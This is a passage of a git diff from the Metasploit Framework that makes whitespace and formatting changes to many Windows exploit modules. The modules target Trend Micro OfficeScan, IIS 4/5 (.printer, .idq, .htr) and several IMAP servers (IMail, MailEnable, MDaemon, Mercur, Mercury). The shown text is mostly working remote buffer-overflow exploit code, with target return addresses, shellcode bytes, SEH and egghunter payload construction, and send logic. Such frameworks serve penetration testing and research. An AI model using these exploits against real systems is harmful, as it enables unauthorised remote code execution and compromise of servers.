and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'metasm' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Trend Micro OfficeScan Remote Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in Trend Micro OfficeScan + This module exploits a stack overflow in Trend Micro OfficeScan cgiChkMasterPwd.exe (running with SYSTEM privileges). - }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, 
@@ -42,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # return addresses need to be alphanumeric (here in loadhttp data section) [ 'Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)', { 'Rets' => [0x63613035, 0x63613032] } ], @@ -50,14 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jun 28 2007', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(8080), - ], self.class) + register_options( + [ + Opt::RPORT(8080), + ], self.class) end def exploit - geip_src = " + geip_src = " push esi push esp pop eax @@ -71,10 +80,10 @@ class Metasploit3 < Msf::Exploit::Remote " sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, geip_src) - + sc.base_addr = target['Rets'][0] get_eip = sc.encode_string - + pat = Rex::Text.rand_text_alphanumeric(1016) pat[0, get_eip.length] = get_eip @@ -94,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote 'content-type' => 'application/x-www-form-urlencoded', 'data' => data, }, 5) - + handler end diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index 1ddb1497ce..4707c9b92f 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb 
@@ -3,32 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS 5.0 Printer Host Header Overflow', 'Description' => %q{ - This exploits a buffer overflow in the request processor of + This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -40,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'BID', '2674'], [ 'MSB', 'MS01-023'], [ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'], - ], 'Privileged' => false, 'Payload' => @@ -48,12 +44,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 900, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ - [ - 'Windows 2000 English SP0-SP1', + [ + 'Windows 2000 English SP0-SP1', { 'Platform' => 'win', 'Ret' => 0x732c45f3, @@ -63,11 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'DisclosureDate' => 'May 1 2001', 'DefaultTarget' => 0)) - + register_options( [ Opt::RPORT(80) - ], self.class) + ], self.class) end 
@@ -76,40 +71,40 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - + if !(resp and resp =~ /Error in web printer/) return Exploit::CheckCode::Safe end - + connect sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n") resp = sock.get_once disconnect - - if (resp and resp =~ /locked out/) + + if (resp and resp =~ /locked out/) print_status("The IUSER account is locked out, we can't check") return Exploit::CheckCode::Detected end - + if (resp and resp.index("HTTP/1.1 500") >= 0) return Exploit::CheckCode::Vulnerable end - + return Exploit::CheckCode::Safe end - + def exploit connect - + buf = make_nops(280) buf[268, 4] = [target.ret].pack('V') - + # payload is at: [ebx + 96] + 256 + 64 buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96] buf << "\x80\xc1\x40" # add cl, 64 buf << "\x80\xc5\x01" # add ch, 1 - buf << "\xff\xe1" # jmp ecx - + buf << "\xff\xe1" # jmp ecx + sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n") handler diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 400c62dbaf..526d7ff18e 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow', 'Description' => %q{ - This module exploits a stack overflow in the IDQ ISAPI handler for + This module exploits a stack overflow in the IDQ ISAPI handler for Microsoft Index Server. }, 'Author' => [ 'MC' ], 
@@ -47,36 +45,35 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, }, - + 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ], [ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ], ], 'DisclosureDate' => 'June 18 2001', 'DefaultTarget' => 0)) - - register_options([Opt::RPORT(80)], self.class) - + + register_options([Opt::RPORT(80)], self.class) end def exploit connect sploit = rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232) - sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4] - sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4] + sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" sploit << rand_text_alphanumeric(1) + " HTTP/1.0\r\n\r\n" + rand_text_alphanumeric(46) - uri = '/' + sploit + payload.encoded + uri = '/' + sploit + payload.encoded res = "GET #{uri}\r\n\r\n" print_status("Trying target #{target.name}...") sock.put(res) - + handler disconnect end diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 38c4025a74..707697717a 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS 4.0 .HTR Path Overflow', 'Description' => %q{ - This exploits a buffer overflow in the ISAPI ISM.DLL used to + This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being @@ -32,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote thread, the server will crash upon exit of the bind shell. The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters. - }, 'Author' => [ 'stinko' ], 'License' => BSD_LICENSE, @@ -44,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'BID', '307'], [ 'URL', 'http://www.eeye.com/html/research/advisories/AD19990608.html'], [ 'MSB', 'MS02-018'], - ], 'Privileged' => true, 'Payload' => @@ -54,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows NT 4.0 SP3', {'Platform' => 'win', 'Rets' => [ 593, 0x77f81a4d ] }], ['Windows NT 4.0 SP4', {'Platform' => 'win', 'Rets' => [ 593, 0x77f7635d ] }], @@ -62,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Apr 10 2002', 'DefaultTarget' => 0)) - + register_options( [ Opt::RPORT(80) 
@@ -75,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote buf = 'X' * target['Rets'][0] buf << [ target['Rets'][1] ].pack('V') buf << payload.encoded - + req = "GET /#{buf}.htr HTTP/1.0\r\n\r\n" print_status("Trying target #{target.name} with jmp eax at 0x%.8x..." % target['Rets'][1]) sock.put(req) diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 19bdd278d6..2e01659447 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -3,30 +3,27 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IMail IMAP4D Delete Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the 'DELETE' + This module exploits a buffer overflow in the 'DELETE' command of the the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. - }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, @@ -36,10 +33,9 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2004-1520'], [ 'OSVDB', '11838'], [ 'BID', '11675'], - ], 'Privileged' => true, - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, @@ -54,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote } }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # alphanum rets :(, will look more into it later ['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }], 
@@ -65,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_login - + print_status("Sending overflow string...") req = 'A683 DELETE ' req << payload.encoded @@ -84,15 +80,15 @@ class Metasploit3 < Msf::Exploit::Remote req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50" req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57" req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a" - + # Run off the stack, so we don't kill our payload, or something... req << rand_text_alphanumeric(600) - + # Terminate the request req << "\r\n" - + sock.put(req) - + handler disconnect end diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index d8a721e9a7..bb137587a2 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb 
@@ -3,30 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Ipswitch IMail IMAP SEARCH Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH - verb. By sending an overly long string, an attacker can overwrite the + This module exploits a stack overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH + verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. In order for this module to be successful, the IMAP user must have at least one - message. + message. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 
@@ -46,35 +44,34 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 400, 'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 } ], - [ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ] + [ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'July 18 2007')) - end - + def exploit - sploit = "a002 SEARCH BEFORE " + "<" + rand_text_english(87) + sploit = "a002 SEARCH BEFORE " + "<" + rand_text_english(87) sploit << [target.ret].pack('V') + make_nops(20) + payload.encoded + ">" - info = connect_login - + info = connect_login + if (info == true) print_status("Trying target #{target.name}...") sock.put("a001 SELECT INBOX\r\n") sock.get_once(-1, 3) sock.put(sploit + "\r\n") else - print_status("Not falling through with exploit") + print_status("Not falling through with exploit") end - + handler disconnect diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index fac2da1ac1..4e2bb0b22f 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb 
@@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MailEnable IMAPD (2.35) Login Request Buffer Overflow', 'Description' => %q{ - MailEnable's IMAP server contains a buffer overflow - vulnerability in the Login command. + MailEnable's IMAP server contains a buffer overflow + vulnerability in the Login command. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -39,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 450, @@ -47,33 +45,33 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MailEnable 2.35 Pro', { 'Ret' => 0x10049abb } ], #MEAISP.DLL ], 'DisclosureDate' => 'Dec 11 2006', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(143) ], self.class ) + register_options( [ Opt::RPORT(143) ], self.class ) end def exploit connect - auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n" - sploit = rand_text_alpha_upper(556) + [target.ret].pack('V') + auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n" + sploit = rand_text_alpha_upper(556) + [target.ret].pack('V') sploit << payload.encoded + "\r\n\r\n" res = sock.recv(50) - if ( res =~ / OK IMAP4rev1/) + if ( res =~ / OK IMAP4rev1/) print_status("Trying target #{target.name}...") sock.put(auth) - sock.get_once(-1, 3) + sock.get_once(-1, 3) sock.put(sploit) else print_status("Not running IMAP4rev1...") end - + handler disconnect end 
diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index 36c6abf2c3..311b0adab2 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,14 +18,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MailEnable IMAPD (1.54) STATUS Request Buffer Overflow', 'Description' => %q{ - MailEnable's IMAP server contains a buffer overflow + MailEnable's IMAP server contains a buffer overflow vulnerability in the STATUS command. With proper credentials, this could allow for the execution of arbitrary code. - }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -38,13 +35,12 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '17844'], [ 'BID', '14243'], [ 'NSS', '19193'], - ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 450, @@ -52,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['MailEnable 1.54 Pro Universal', { 'Rets' => [9273, 0x1001c019] }], #MEAISP.DLL ['Windows XP Pro SP0/SP1 English', { 'Rets' => [9273, 0x71aa32ad] }], 
@@ -65,13 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_login - + seh = generate_seh_payload(target['Rets'][1]) buf = rand_text_alphanumeric(target['Rets'][0]) req = "a001 STATUS \".\x00" + buf + seh req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n" sock.put(req) - + handler disconnect end diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index ccb7e5492c..e367643548 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,23 +18,22 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the W3C logging + This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected. - }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2005-3155'], + [ 'CVE', '2005-3155'], [ 'OSVDB', '19842'], [ 'BID', '15006'], ], 
@@ -44,41 +41,40 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 600, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL ], 'DisclosureDate' => '', 'DefaultTarget' => 0)) end - + def check connect disconnect - + if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect_login - - buf = rand_text_alphanumeric(6196, payload_badchars) + + buf = rand_text_alphanumeric(6196, payload_badchars) seh = generate_seh_payload(target.ret) req = 'a01 SELECT ' + buf + seh + "\r\n" sock.put(req) - + handler disconnect end diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 7b7468ee64..4000262508 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the CRAM-MD5 + This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts. - }, 'Author' => [ 'anonymous' ], 'License' => BSD_LICENSE, 
@@ -35,22 +32,20 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2004-1520'], [ 'OSVDB', '11838'], [ 'BID', '11675'], - ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ], ], @@ -60,27 +55,27 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - + print_status("Asking for CRAM-MD5 authentication...") sock.put("a001 authenticate cram-md5\r\n") res = sock.get_once - - + + print_status("Received CRAM-MD5 answer: #{res.chomp}") # Magic no return-address exploitation ninjaness! buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff" req = Rex::Text.encode_base64(buf) + "\r\n" sock.put(req) res = sock.get_once - + print_status("Received authentication reply: #{res.chomp}") print_status("Sending LOGOUT to close the thread and trigger an exception") sock.put("a002 LOGOUT\r\n") res = sock.get_once - + print_status("Received LOGOUT reply: #{res.chomp}") sleep(1) - + handler disconnect end diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 4425003686..6fd5da8f48 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking 
@@ -20,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MDaemon 9.6.4 IMAPD FETCH Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Alt-N MDaemon IMAP Server + This module exploits a stack overflow in the Alt-N MDaemon IMAP Server version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP account credentials are required. Credit to Matteo Memelli }, @@ -48,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x0a])", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MDaemon Version 9.6.4', { 'Ret' => 0x64dc118b } ], # p/p/r HashCash.dll ], diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index a6fdbc2a39..31aaf09e3b 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb 
@@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow', 'Description' => %q{ - Mercur v5.0 IMAP server is prone to a remotely exploitable - stack-based buffer overflow vulnerability. This issue is due - to a failure of the application to properly bounds check + Mercur v5.0 IMAP server is prone to a remotely exploitable + stack-based buffer overflow vulnerability. This issue is due + to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discover the vulnerability. }, @@ -50,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 Server SP4 English', { 'Offset' => 126, 'Ret' => 0x13e50b42 }], ['Windows 2000 Pro SP1 English', { 'Offset' => 127, 'Ret' => 0x1446e242 }], 
@@ -59,22 +57,22 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 17 2006')) end - - def exploit - sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20" - sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset']) - sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8) - sploit << payload.encoded + rand_text_alpha_upper(453) - info = connect_login - + def exploit + sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20" + sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset']) + sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8) + sploit << payload.encoded + rand_text_alpha_upper(453) + + info = connect_login + if (info == true) print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret) sock.put(sploit + "\r\n") else - print_status("Not falling through with exploit") + print_status("Not falling through with exploit") end - + handler disconnect end diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index aea811d012..0b28ee6769 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking 
@@ -20,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Egghunter def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercur Messaging 2005 IMAP Login Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3. + This module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results. }, @@ -41,15 +39,15 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 228, 'BadChars' => "\x00\x20\x2c\x3a\x40", - 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ], [ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ], @@ -57,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 17 2006', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(143) ], self.class ) + register_options( [ Opt::RPORT(143) ], self.class ) end def exploit @@ -68,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote egg = hunter[1] sploit = "A001 LOGIN " + egg + egg + payload.encoded + hunter[0] - sploit << [target.ret].pack('V') + [0xe9, -175].pack('CV') + sploit << [target.ret].pack('V') + [0xe9, -175].pack('CV') print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 6e403e55fb..f7ca2b18e4 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb 
@@ -3,23 +3,21 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercury/32 <= 4.01b LOGIN Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Mercury/32 <= 4.01b IMAPD @@ -39,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 800, @@ -47,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP0-SP4 